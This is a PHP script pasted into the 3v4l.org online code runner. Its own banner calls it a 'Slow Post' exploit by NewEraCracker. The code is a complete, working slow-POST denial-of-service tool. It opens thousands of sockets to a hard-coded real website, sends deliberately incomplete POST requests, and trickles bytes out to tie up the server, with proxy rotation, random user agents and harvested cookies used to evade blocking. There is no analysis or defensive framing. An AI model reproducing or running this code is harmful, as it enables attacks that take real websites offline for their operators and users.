3v4l.org

run code in 150+ php & hhvm versions
Bugs & Features
<?php ignore_user_abort(true); set_time_limit(0); $_SERVER['argv'][1] = 'http://aeestesl.com/index.php?option=com_content&view=article&id=144&Itemid=70'; //------------------------- // CONFiG //------------------------- $default_max_cookies = 100; $default_max_sockets = 9001; $default_msec_timeout = 500; $default_usleep_time = 0; //------------------------- // INiT //------------------------- // Define EXPLOIT_VERSION if( !defined('EXPLOIT_VERSION') ) define( 'EXPLOIT_VERSION', 'v1.6.2' ); // Define STDIN if( !defined('STDIN') ) define( 'STDIN', fopen('php://stdin','r') ); // Check SAPI if(PHP_SAPI != 'cli') { echo 'This script is not meant to be ran via browser.'; exit(1); } // Globals - DO NOT EDIT $global_proxy_array = null; //------------------------- // FUNCTiONS FOR THE LULZ //------------------------- /** Read STDIN and return it */ function readSTDIN() { $file = STDIN; if(!$file) return false; $data = fgets($file); return rtrim($data); } /** Receive a filename that has proxies listed in it and fills the $global_proxy_array */ function proxyLoadFile($filename) { global $global_proxy_array; // Load proxy list file $filename = str_replace('\\','/',$filename); $global_proxy_array = @file_get_contents($filename); if(!$filename || !$global_proxy_array) { echo $filename.' is not a valid proxy-list file!'; exit(1); } $global_proxy_array = str_replace( array("\r\n","\r"), "\n", $global_proxy_array); $global_proxy_array = explode("\n",$global_proxy_array); // Grab the proxies foreach($global_proxy_array as $key => $value) { $global_proxy_array[$key] = explode(':',$value); if( isset($global_proxy_array[$key][0], $global_proxy_array[$key][1]) ) { // This allows me to get proxies from lists like // IP:PORT bla bla bla $global_proxy_array[$key][1] = explode(' ',$global_proxy_array[$key][1]); $global_proxy_array[$key][1] = explode("\t",$global_proxy_array[$key][1][0]); $global_proxy_array[$key][1] = $global_proxy_array[$key][1][0]; // The proxy $global_proxy_array[$key] = array('host' => $global_proxy_array[$key][0], 'port' => $global_proxy_array[$key][1]); } else { unset($global_proxy_array[$key]); } } } /** Returns a random a proxy */ function proxyGetRandom() { global $global_proxy_array; // Give a random proxy $proxy = null; if( count($global_proxy_array) ) { while( !$proxy ) { $rand = mt_rand(0,count($global_proxy_array)-1); $proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null); } return $proxy; } return false; } /** Returns a random useragent */ function randomUserAgent() { // Microsoft Windows versions $os = array('5.0','5.1','5.2','6.0','6.1','6.2'); // Select a random windows $os = $os [ mt_rand(0,count($os)-1) ]; // Select a random browser if( mt_rand(0,1) ) { // Internet Explorer versions $ua[0] = array('4.0','7.0'); $ua[1] = array('4.0','8.0'); $ua[2] = array('5.0','9.0'); // Random IE $ua = $ua [ mt_rand(0,count($ua)-1) ]; return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[0]})"; } else { // Mozilla Firefox versions $ua = array('18.0','19.0','20.0'); // Random FF $ua = $ua [ mt_rand(0,count($ua)-1) ]; return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}) Gecko/20100101 Firefox/{$ua}"; } } /** Opens a custom socket and returns it */ function openCustomSocket($newEraUrl, $newEraProxy=null) { global $default_msec_timeout; $newEraConnection = (($newEraProxy == null) ? $newEraUrl : $newEraProxy); $host = (($newEraConnection->ssl) ? 'ssl://' : 'tcp://').$newEraConnection->name; $fp = @fsockopen($host, $newEraConnection->port, $errno, $errstr, 1); if (!$fp) return false; stream_set_blocking($fp,0); stream_set_timeout($fp,0,$default_msec_timeout); return $fp; } /** * Receives a socket and performs the start of a slowPosting * Returns Content-Length on success and false on failure */ function slowPostStart($sock, $newEraUrl, $newEraProxy, $cookie) { // Check the socket if($sock) { // Generate a random Content-Length $length = mt_rand(1337,31337); // Init if($newEraProxy == null) $out = 'POST /'.$newEraUrl->path.' HTTP/1.1'."\r\n"; else $out = 'POST '.$newEraUrl->full_url.' HTTP/1.1'."\r\n"; // Build $out .= 'Host: '.$newEraUrl->name."\r\n"; $out .= 'Connection: Keep-Alive'."\r\n"; $out .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n"; $out .= 'User-Agent: '.randomUserAgent()."\r\n"; $out .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n"; $out .= 'Accept-Encoding: gzip,deflate'."\r\n"; $out .= 'Keep-Alive: '.mt_rand(60,120)."\r\n"; $out .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n"; $out .= mt_rand(0,1) ? 'Referer: '.($newEraUrl->ssl?'https://':'http://').$newEraUrl->name.'/'."\r\n" : ''; $out .= ($cookie ? "Cookie: {$cookie}\r\n" : '' ); $out .= 'Content-Length: '.$length."\r\n"; $out .= "\r\n"; // Do it @fwrite($sock, $out); return $length; } return false; } /** Receives a socket and continues the slowPosting */ function slowPostContinue($sock,$bytes=5) { global $default_usleep_time; // Throttle execution speed slightly if( $default_usleep_time > 0 ) @usleep($default_usleep_time); // Check the $bytes if( intval($bytes) != $bytes ) $bytes=5; // Check the socket if($sock) { // Do it :D $out = ''; for($j=0;$j<$bytes;$j++); { $out .= chr(mt_rand(33,126)); } $out = urlencode($out); @fwrite($sock, $out); return true; } else return false; } //------------------------- // CLASSES FOR THE LULZ //------------------------- /** I want cookies! Give me cookies! */ class NewEraCookies { private $max_cookies; private $cookies = array(); /** Constructor */ public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile=null, $output=false) { $this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output); } /** Object updater */ public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile=null, $output=false) { $this->max_cookies = $max_cookies; $this->cookies = array(); if($output) echo PHP_EOL.'BUILDING COOKIES '; for($i=0; $i<$this->max_cookies; $i++) { // Using Proxy file? if( $proxyFile ) { $newproxy = proxyGetRandom(); if(!$newproxy) exit($proxyFile.' is not a valid proxy-list file!'); $newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']); } $this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy); if($output) echo '.'; } } /** Returns a cookie by its index */ public function returnCookieByIndex($idx) { if($idx == 'random') $idx = mt_rand(0, $this->max_cookies-1); if(isset($this->cookies[$idx])) return $this->cookies[$idx]; return ''; } /** Function to parse set-cookie from header fields */ public static function cookieParse($header) { $cookies = array(); foreach($header as $line) { if(preg_match('/^Set-Cookie: /i', $line)) { $line = preg_replace('/^Set-Cookie: /i', '', trim($line)); $csplit = explode(';', $line); $cdata = array(); $has_grabbed_cookie_data = false; foreach($csplit as $data) { $cinfo = explode('=', $data); $cinfo[0] = trim($cinfo[0]); if(!$has_grabbed_cookie_data) { $cdata['value']['key'] = $cinfo[0]; $cdata['value']['value'] = $cinfo[1]; $has_grabbed_cookie_data = true; continue; } $cinfo[0] = strtolower($cinfo[0]); if($cinfo[0] == 'expires') $cinfo[1] = strtotime($cinfo[1]); if($cinfo[0] == 'secure') $cinfo[1] = 'true'; if(in_array($cinfo[0], array('domain', 'expires','path','secure','comment'))) { $cdata[trim($cinfo[0])] = $cinfo[1]; } } $cookies[] = $cdata; } } return $cookies; } /** Function to build the request cookie header from parsed set-cookie data */ public static function cookieBuild($data) { if(is_array($data)) { $cookie = array(); foreach($data as $d) $cookie[] = $d['value']['key'].'='.$d['value']['value']; if(count($cookie) > 0) return trim(implode('; ', $cookie)); } return false; } /** Function to grab cookies from an url using PHP's fopen */ public static function cookieGrab($newEraUrl, $newEraProxy=null) { // Build connection headers $headers = 'Connection: Keep-Alive'."\r\n"; $headers .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n"; $headers .= 'User-Agent: '.randomUserAgent()."\r\n"; $headers .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n"; $headers .= 'Accept-Encoding: gzip,deflate'."\r\n"; $headers .= 'Keep-Alive: '.mt_rand(60,120)."\r\n"; // Check proxy url if($newEraProxy == null) { // Disable proxy $proxy_url = ''; $request_fulluri = false; } else { // Enable proxy $proxy_url = $newEraProxy->full_url; $request_fulluri = true; } // Build stream context $context = stream_context_create(array( 'http' => array( 'method' => 'GET', 'timeout' => (3), 'header' => $headers, 'proxy' => $proxy_url, 'request_fulluri' => $request_fulluri, 'max_redirects' => (0), 'protocol_version' => (1.1), 'ignore_errors' => true ), 'ssl' => array( 'verify_peer' => false ) )); // Let the fun begin $cookie = ''; $handle = @fopen($newEraUrl->full_url, 'r', false, $context); // I hope this does work if($handle) { // If it worked, we grab the cookies $metadata = stream_get_meta_data($handle); $cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data'])); // Fun is only at a small distance @fclose($handle); } return $cookie; } } /** Class to construct and handle an url-like object */ class NewEraUrl { private $host_full_url; private $host_protocol; private $host_ssl; private $host_name; private $host_port; private $host_path; /** Constructor */ public function __construct($host_full_url) { $this->update_object($host_full_url); } /** Object updater */ public function update_object($host_full_url) { $this->host_full_url = $host_full_url; $this->host_ssl = ((strpos($this->host_full_url, 'https') === 0) ? true : false); $this->host_protocol = ($this->host_ssl ? 'https' : 'http'); // Grab other parameters $host_full_url = explode('/',$host_full_url,4); $host_full_url[2] = explode(':',$host_full_url[2],2); // Host, Port, Path $this->host_name = $host_full_url[2][0]; $this->host_port = (isset($host_full_url[2][1]) ? $host_full_url[2][1] : ($this->host_ssl ? 443 : 80)); $this->host_path = (isset($host_full_url[3]) ? $host_full_url[3] : ''); } /** Getter for the private properties */ public function __get($var) { $var = 'host_'.$var; if(property_exists($this,$var)) return $this->{$var}; } /** Quick check to see if url is minimally valid */ public static function isValid($host_full_url) { if(strpos($host_full_url,'https://') === 0 || strpos($host_full_url,'http://') === 0) return true; } } /** Class to construct and handle a proxy-like object */ class NewEraProxy { private $proxy_full_url; private $proxy_protocol; private $proxy_ssl; private $proxy_name; private $proxy_port; /** Constructor */ public function __construct($proxy_full_url) { $this->update_object($proxy_full_url); } /** Object updater */ public function update_object($proxy_full_url) { $this->proxy_full_url = $proxy_full_url; $this->proxy_ssl = ((strpos($this->proxy_full_url, 'ssl') === 0) ? true : false); $this->proxy_protocol = ($this->proxy_ssl ? 'ssl' : 'tcp'); // Grab other parameters if( false !== ($tmp = strpos($proxy_full_url,'://')) ) $proxy_full_url = substr($proxy_full_url, $tmp+3); $proxy_full_url = explode(':',$proxy_full_url); // Host, Port, Path $this->proxy_name = $proxy_full_url[0]; $this->proxy_port = (int)(isset($proxy_full_url[1]) ? $proxy_full_url[1] : ($this->proxy_ssl ? '443' : '80')); } /** Getter for the private properties */ public function __get($var) { $var = 'proxy_'.$var; if(property_exists($this,$var)) return $this->{$var}; } } //------------------------- // MAiN CODE FOR THE LULZ //------------------------- echo " _______. __ ______ ____ __ ____ / || | / __ \ \ \ / \ / / | (----`| | | | | | \ \/ \/ / \ \ | | | | | | \ / .----) | | `----.| `--' | \ /\ / |_______/ |_______| \______/ \__/ \__/ .______ ______ _______.___________. | _ \ / __ \ / | | | |_) | | | | | | (----`---| |----` | ___/ | | | | \ \ | | | | | `--' | .----) | | | | _| \______/ |_______/ |__| "; echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL; // Fetch the URL to attack $url = null; if( isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1]) ) $url = $_SERVER['argv'][1]; // Fetch proxy to use $proxy['host'] = null; $proxy['port'] = null; $proxy['file'] = false; if( !empty($url) && isset($_SERVER['argv'][2]) ) { if( $proxy = explode(':',$_SERVER['argv'][2]) ) { if( isset($proxy[0], $proxy[1]) ) { $proxy['file'] = false; $proxy['host'] = $proxy[0]; $proxy['port'] = $proxy[1]; unset($proxy[0], $proxy[1]); } } if( !( isset($proxy['host']) && isset($proxy['port']) ) && is_readable($_SERVER['argv'][2]) ) { $proxy['file'] = true; $proxy['filename'] = $_SERVER['argv'][2]; } } // Ask for proxy if( empty($url) && ( empty($proxy['host']) || empty($proxy['port']) ) && !$proxy['file'] ) { $proxy['use'] = null; while( !$proxy['use'] ) { echo PHP_EOL.'Do you want to use a proxy [yes/no/file]: '; $proxy['use'] = readSTDIN(); if( strpos(strtolower($proxy['use']),'y') === 0 ) { echo PHP_EOL.'Proxy IP: '; $proxy['host'] = readSTDIN(); echo PHP_EOL.'Proxy Port: '; $proxy['port'] = readSTDIN(); } elseif( strpos(strtolower($proxy['use']),'n') === 0 ) { break; } elseif( strpos(strtolower($proxy['use']),'f') === 0 ) { echo PHP_EOL.'Proxy file: '; $proxy['filename'] = readSTDIN(); if( is_readable($proxy['filename']) ) { $proxy['file'] = true; } else { echo PHP_EOL.'Invalid file!'.PHP_EOL; $proxy['use'] = null; } } else { $proxy['use'] = null; echo PHP_EOL.'Invalid choice!'.PHP_EOL; } } unset($proxy['use']); } // Ask for target URL while( !$url ) { echo PHP_EOL.'Target url: '; $url = readSTDIN(); if( NewEraUrl::isValid($url) ) break; $url = null; echo PHP_EOL.'Invalid target!'.PHP_EOL; } // Init proxy suport if( empty($proxy['host']) || empty($proxy['port']) ) { $newEraProxy = null; if( !empty($proxy['file']) ) { proxyLoadFile($proxy['filename']); $newproxy = proxyGetRandom(); if(!$newproxy) exit($proxy['filename'].' is not a valid proxy-list file!'); $newEraProxy = new NewEraProxy('tcp://'.$newproxy['host'].':'.$newproxy['port']); } } else { $newEraProxy = new NewEraProxy('tcp://'.$proxy['host'].':'.$proxy['port']); } // Init the others @ini_set('default_socket_timeout',1); $newEraUrl = new NewEraUrl($url); $newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $default_max_cookies, $proxy['file'], true); // Do it while(true) { $fp = array(); // Start echo PHP_EOL.'IMMA FIRIN MAH LAZOR '; for($i=0;$i<$default_max_sockets;$i++) { // Using Proxy file? if( $proxy['file'] ) { $newproxy = proxyGetRandom(); if(!$newproxy) exit($proxy['filename'].' is not a valid proxy-list file!'); $newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']); } // Open a new socket (only try to open SSL sockets if not using proxies) if( $fp[$i]['sock'] = openCustomSocket($newEraUrl, $newEraProxy) ) { // Progress bar? echo '+'; // Start a new slowPost if( $_length = slowPostStart($fp[$i]['sock'], $newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random') ) ) { // Find the lenght if( !isset($fp[$i]['length']) ) { $fp[$i]['length'] = $_length; } } else { // Epic fail? @fclose($fp[$i]['sock']); unset($fp[$i]); } } else { // Epic fail? @fclose($fp[$i]['sock']); unset($fp[$i]); } // Check the current sockets foreach($fp as $_k => $_v) { if($fp[$_k]['length'] > 0) { // Contine old slowPosts $_length = ($fp[$_k]['length'] < 5) ? $fp[$_k]['length'] : 5; slowPostContinue($fp[$_k]['sock'],$_length); $fp[$_k]['length'] = $fp[$_k]['length']-$_length; } else { // Close completed slowPosts @fclose($fp[$_k]['sock']); unset($fp[$_k]); } } unset($_k,$_v); } // Restart foreach($fp as $_k => $_v) { @fclose($fp[$_k]['sock']); } $newEraCookies->update_object($newEraUrl, $newEraProxy, $default_max_cookies, $proxy['file'], true); } ?>